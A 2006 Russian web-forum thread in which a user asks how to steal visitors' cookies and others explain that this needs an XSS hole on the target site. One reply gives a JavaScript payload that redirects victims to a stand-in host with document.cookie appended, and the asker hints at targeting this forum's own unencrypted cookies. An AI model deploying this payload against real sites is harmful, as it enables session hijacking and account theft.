|
|
|
| задача заключаеться в следующем : при захождении пользователя на мою страницу я вытаскиваю все его кукиз к себе на сервер, возможно это сделать??? если да то как???? | |
|
|
|
|
|
|
|
для: deadlol
(20.09.2006 в 01:57)
| | )))) все невозможно ... одни то не вытащите ... короче надо чтобы хост был одинаковым т мем куки которого вы хотите стащить (обчно это делается прямо на сайте (куки кторого вы хотите стащить делается атака XXS помойму (в общем чтобы на странице этого сайта был ява скрипт который бы перенаправлял всех на ваш скрипт и там уже забирал куки и например записывал их куданибуть)))
извините за плохое изложение )) (спать хочу)
если что непонятно, завтра объясню | |
|
|
|
|
|
|
|
для: deadlol
(20.09.2006 в 01:57)
| | При заходе на ваш сайт вы можете получить только cookie, установленные вашим сайтом, cookie установленные другими сайтами можно извлечь только с других сайтов, обычно это и является целью XSS-атаки. | |
|
|
|
|
|
|
|
для: cheops
(20.09.2006 в 12:31)
| | как сложно это реализовать ????
есть какая нить инфа на тему????
заранее благодарен!!!!! | |
|
|
|
|
|
|
|
для: deadlol
(20.09.2006 в 13:03)
| | Такие примеры рассматриваются в нашей книге "Головоломки на PHP для хакера". Однако не расчитывайте, что это просто, сайт должен иметь дыру, чтобы иметь возможность загрузки эксплоита, кроме того, владельцы сайта почти наверняка обнаружат эксполит, да и для сбора cookie потребуется хост куда вы будете перебрасывать посетителей, по которому вас будет не сложно вычислить. | |
|
|
|
|
|
|
|
для: cheops
(20.09.2006 в 13:14)
| | НИКАКИХ намерений по использованию чужой иформации в своих целях я не приследую.
Просто хотел ознакомиться с данной технологией.
т.е другими словами мне нужно сделать редирект пользователя на свою страницу????
такую ситуацию можно использовать в своих целях:
на сервере ХХХ используеться для проверки подлинности узера куки метод , допустим что срок годности печений не ограничен (конечно это глупость но все же). На этом сервере есть большое кол-во пользователей, зарегистрированные пользователи (т.е те у каторых есть кукиз) могут просматривать унфу друг друга. А я соответственно в своей инфе указываю свою домашнюю страницу, которая и будет .........
Ситуация выдуманна любое совпадение случайно. | |
|
|
|
|
|
|
|
для: DeadLOL
(20.09.2006 в 13:27)
| | Под эти все определения подходит этот форум, вот недавно была тема http://www.softtime.ru/forum/read.php?id_forum=2&id_theme=23939 - была возможность XSS-атаки при ответе на сообщение атакующего, если вместо alert() использовать location.href='http://www.mysite.ru/index.php?cookie=' + document.cookie, то на своём сайте www.mysite.ru в скрипте index.php можно было бы получить cookie через параметр $_GET['cookie'] и помещать их базу данных или файл. | |
|
|
|
|
|
|
|
для: cheops
(20.09.2006 в 13:36)
| | Ой а у вас куки на 4 дня 2шт плюс не шифрованные......
приведите пример index.php on www.myserv.ru | |
|
|
|
|
|
|
|
для: cheops
(20.09.2006 в 13:14)
| | ок спс я сделал
не надо высылать исходник | |
|
|
|